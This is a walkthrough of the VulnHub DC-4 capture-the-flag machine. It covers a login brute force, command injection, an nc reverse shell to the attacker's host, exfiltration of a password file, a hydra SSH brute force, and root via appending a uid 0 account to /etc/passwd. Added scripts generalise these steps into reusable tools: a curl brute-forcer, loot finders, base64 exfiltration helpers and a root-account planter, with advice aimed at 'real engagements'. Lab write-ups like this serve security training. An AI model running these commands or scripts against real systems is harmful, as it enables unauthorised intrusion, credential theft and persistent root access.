Vulnhub | DC-4 target machine penetration test

DC series target 4/9
Main topics: brute-forcing the login form with Burp Suite, intercepting a request to get command execution (RCE), reverse shell, SSH brute force, privilege escalation via teehee

官网下载地址:https://www.vulnhub.com/entry/dc-4,313/
作者主页下载地址:https://www.five86.com/dc-4.html
Target description:
(screenshot: the description from the VulnHub page)



Information gathering

Host discovery

arp-scan -l
192.168.1.186

Port scanning

nmap -sS -p- -A 192.168.1.186

Ports 22 (SSH) and 80 (HTTP) are open.

Also run nmap's built-in vuln scripts:

nmap --script=vuln 192.168.1.186

It reports a possible CSRF issue, which is of no use here.

Look at the web page: a login form, and nothing interesting in the page source.
(screenshot: login form)


Brute force

Brute-forcing the login form with Burp Suite Intruder yields the credentials:

admin/happy

(screenshot: brute-force result)
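The same attack scripted with curl, as an added example that is not part of the original post. It assumes, without confirmation from the page, that the form POSTs to /login.php with fields named username and password, and that an accepted login answers with an HTTP 302 redirect while a rejected one re-renders the form with HTTP 200; check those two things in Burp first and adjust try_login if the target differs.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): a scripted version of the Burp
# Intruder attack on the DC-4 login form. Assumed, not confirmed by the page:
# POST /login.php with fields "username" and "password"; success = HTTP 302,
# failure = HTTP 200 with the form rendered again.
set -u

TARGET="${TARGET:-http://192.168.1.186}"
COOKIE_JAR="${COOKIE_JAR:-/tmp/dc4.cookies}"

# try_login USER PASS -> exit 0 when the server redirects (login accepted).
# -s silent, -o /dev/null drops the body, -w prints only the status code,
# -c stores the PHP session cookie so a later request to command.php reuses it.
try_login() {
    local user="$1" pass="$2" code
    code=$(curl -s -o /dev/null -w '%{http_code}' -c "$COOKIE_JAR" \
        --data-urlencode "username=${user}" \
        --data-urlencode "password=${pass}" \
        "${TARGET}/login.php") || return 1
    [ "$code" = "302" ]
}

# brute_login USER WORDLIST -> prints "user:password" for the first accepted
# pair and exits 0; exits 1 when the wordlist is exhausted without a hit.
# The read loop also handles a wordlist whose last line has no newline.
brute_login() {
    local user="$1" wordlist="$2" pass
    while IFS= read -r pass || [ -n "$pass" ]; do
        if try_login "$user" "$pass"; then
            printf '%s:%s\n' "$user" "$pass"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Usage when run directly:
#   ./dc4-login-brute.sh admin /usr/share/wordlists/rockyou.txt
if [ "$#" -ge 2 ]; then
    brute_login "$1" "$2"
fi
```

Detecting success by status code rather than by response length is what makes the loop robust: Intruder's length column works on DC-4 only because the error page and the redirect happen to differ in size. Keep the attempt rate modest on a real engagement; nothing here throttles, and each attempt is one full HTTP request.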
Log in to the backend; it offers a command-execution feature.

(screenshot: command execution page)
(screenshot: the commands that can be run)


Command execution vulnerability (RCE)

Intercept the request in Burp and replace the command with one of your own:
(screenshot: intercepted request with the command changed)
whoami executes successfully.

(screenshot: whoami output)


Finding users

Run cat /etc/passwd; three ordinary users turn up: charles, jim and sam.
(screenshot: users found)


Reverse shell

On Kali:
nc -lvnp 2333
On the target (sent through the command-execution feature):
nc -e /bin/bash 192.168.1.101 2333

(screenshot: reverse shell)
Use python to spawn an interactive pty shell:

python -c "import pty;pty.spawn('/bin/bash')"

(screenshot: interactive shell)


Looking around

www-data@dc-4:/usr/share/nginx/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-4:/usr/share/nginx/html$ ls
command.php  css  images  index.php  login.php  logout.php
www-data@dc-4:/usr/share/nginx/html$ cd /home
www-data@dc-4:/home$ ls
charles  jim  sam
www-data@dc-4:/home$ ls -lah charles
total 20K
drwxr-xr-x 2 charles charles 4.0K Apr  7  2019 .
drwxr-xr-x 5 root    root    4.0K Apr  7  2019 ..
-rw-r--r-- 1 charles charles  220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 charles charles 3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 charles charles  675 Apr  6  2019 .profile
www-data@dc-4:/home$ ls -lah jim
total 32K
drwxr-xr-x 3 jim  jim  4.0K Apr  7  2019 .
drwxr-xr-x 5 root root 4.0K Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4.0K Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
test.sh is mode 777 (world-writable); not sure yet whether that is of any use.

www-data@dc-4:/home$ ls -lah sam
total 20K
drwxr-xr-x 2 sam  sam  4.0K Apr  7  2019 .
drwxr-xr-x 5 root root 4.0K Apr  7  2019 ..
-rw-r--r-- 1 sam  sam   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 sam  sam  3.5K Apr  6  2019 .bashrc
-rw-r--r-- 1 sam  sam   675 Apr  6  2019 .profile
www-data@dc-4:/home$ cat jim/mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
www-data@dc-4:/home$ ls -lah jim/backups
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr  7  2019 .
drwxr-xr-x 3 jim jim 4.0K Apr  7  2019 ..
-rw-r--r-- 1 jim jim 2.0K Apr  7  2019 old-passwords.bak
That looks like usable information.
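The two things done by hand above, reading /etc/passwd for real users and walking /home with ls -lah for world-writable scripts and stray backups, as two reusable functions. This is an added example, not code from the original post; both functions take the file or directory to inspect as an argument so they run against a copy of the target's data as well as live on the box.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): post-exploitation triage of
# /etc/passwd and the home directories, done above by hand.

# login_users PASSWD_FILE -> names of ordinary accounts with a usable shell
# (uid 1000 and up, below the "nobody" range, shell not nologin/false).
login_users() {
    awk -F: '$3 >= 1000 && $3 < 65534 && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# loot_candidates HOME_ROOT -> two kinds of leads:
#   - world-writable files (jim's 777 test.sh: if another user or a cron job
#     runs it, editing it is a path to their privileges);
#   - backup, password and mailbox files, marked readable or unreadable for
#     the current user, so nothing is missed because ls mode bits looked wrong.
loot_candidates() {
    local root="$1" f
    find "$root" -type f -perm -o+w 2>/dev/null | while IFS= read -r f; do
        printf 'world-writable %s\n' "$f"
    done
    find "$root" -type f \( -iname '*.bak' -o -iname '*passw*' -o -name mbox \) 2>/dev/null |
    while IFS= read -r f; do
        if [ -r "$f" ]; then printf 'readable %s\n' "$f"; else printf 'unreadable %s\n' "$f"; fi
    done
}

# Live usage on the target:
#   login_users /etc/passwd
#   loot_candidates /home
```

On DC-4 this prints charles, jim and sam, flags /home/jim/test.sh as world-writable and /home/jim/backups/old-passwords.bak as readable, which is exactly the shortlist the manual tour produced.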

Pull old-passwords.bak out to Kali:

On Kali:
nc -lvnp 2334 > old-passwords.txt
On the target:
nc 192.168.1.101 2334 < jim/backups/old-passwords.bak

(screenshot: file transferred)
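The nc transfer above has no integrity check, and it needs nc on the target. As an added example, not part of the original post, here is a fingerprint to compare on both ends plus a fallback that moves the file as one base64 line, which survives copy and paste out of a web response or the command-execution feature when no reverse shell is available.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): file exfiltration with an
# integrity check, and a paste-through fallback for hosts without nc.

# fingerprint FILE -> "<sha256> <size in bytes>". Run it on the target before
# sending and on Kali after receiving; the two lines must match.
fingerprint() {
    printf '%s %s\n' "$(sha256sum "$1" | cut -d' ' -f1)" "$(wc -c < "$1" | tr -d ' ')"
}

# pack FILE -> the file as a single base64 line (no embedded newlines that a
# dumb shell or an HTML response could mangle).
pack() {
    base64 "$1" | tr -d '\n'
    echo
}

# unpack_verify ENCODED_FILE OUT_FILE EXPECTED_FINGERPRINT -> decodes, and
# returns 0 only when the result matches the fingerprint taken on the target.
unpack_verify() {
    base64 -d "$1" > "$2" || return 1
    [ "$(fingerprint "$2")" = "$3" ]
}

# Live usage. On the target (shell or command-execution feature):
#   fingerprint /home/jim/backups/old-passwords.bak
#   pack /home/jim/backups/old-passwords.bak
# On Kali, after pasting the base64 line into encoded.txt:
#   unpack_verify encoded.txt old-passwords.txt "<fingerprint line from the target>"
```

With the nc variant, start the listener before the target-side command, and still run fingerprint on both ends: a connection cut mid-transfer silently leaves a truncated wordlist, and hydra will then happily report no hits.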


Brute-forcing the SSH password with hydra

The wordlist from the previous step was found under jim's home directory, so use it to brute-force jim's SSH password:

hydra -l jim -P old-passwords.txt ssh://192.168.1.186

(screenshot: hydra SSH brute force)
Got it:

jim/jibril04

SSH login
(screenshot: ssh login as jim)


Obtaining another password

Almost missed the hint printed at login: You have mail.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

That gives charles's password: ^xHhA&hvim0y


Privilege escalation

Switch to charles (su charles with the password from the mail) and run sudo -l: the teehee command can be run as root without a password.
(screenshot: sudo -l showing teehee with NOPASSWD)
teehee --help
Its help text is that of tee: it copies standard input to a file, and -a appends instead of overwriting.

echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd
The second field (the password field) is empty, so the account has no password; uid 0 and gid 0 make it root. su test1 then drops into a root shell.
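The same append rehearsed against a scratch copy of /etc/passwd, so the line can be checked before the real file is touched, together with the check that finds the planted account afterwards. This is an added example, not code from the original post; the real tee stands in for teehee, which on DC-4 is a renamed copy of tee. It puts a hash in the password field instead of leaving it empty: the empty field works on this box, but PAM configurations without nullok reject passwordless logins, and a hashed password does not leave a root account open to everyone else on the machine while you are using it.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the /etc/passwd append used
# above, done against a scratch copy, with a hashed password and a check
# for extra uid 0 accounts. tee stands in for DC-4's teehee (a copy of tee).

# make_hash PASSWORD -> SHA-512 crypt hash (needs openssl 1.1.1 or newer)
make_hash() {
    openssl passwd -6 "$1"
}

# add_root_user PASSWD_FILE NAME HASH -> appends a uid 0 / gid 0 account.
# A hash in field 2 is honoured directly (shadow is consulted only when the
# field is "x"), so /etc/shadow does not need to be touched.
add_root_user() {
    local file="$1" name="$2" hash="$3"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash" | tee -a "$file" >/dev/null
}

# find_uid0 PASSWD_FILE -> every uid 0 account other than root. On a healthy
# system this prints nothing; it is also the cleanup list when you are done.
find_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Live usage on DC-4 as charles (sudo -l allows teehee without a password):
#   printf 'test1:%s:0:0:root:/root:/bin/bash\n' "$(make_hash 'S3cret')" | sudo teehee -a /etc/passwd
#   su test1
```

The primitive is "append a line to any file as root", so the same trick works against /etc/sudoers (a NOPASSWD rule for charles) or /etc/crontab (a root cron job); /etc/passwd is just the quickest to turn into a shell. find_uid0 is also the one-liner a defender runs to spot this technique.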

(screenshot: teehee appending to /etc/passwd)
Got root.

(screenshot: root shell)


flag

root@dc-4:/home/charles# cat /root/flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

(screenshot: flag.txt)


Summary

Scan the ports and note them down
Brute-force the login credentials with Burp Suite
Modify the request in Burp Suite to get command execution, then a reverse shell with nc
Look around for anything exploitable
Brute-force SSH with hydra using the wordlist found on the box
Find another account's password in the mailbox
Find a command that runs as root without a password: teehee
Use teehee to create a passwordless uid 0 user
Get the highest-privileged user
Get the flag

Easter egg

www-data@dc-4:/home$ cat jim/test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."

That's all.
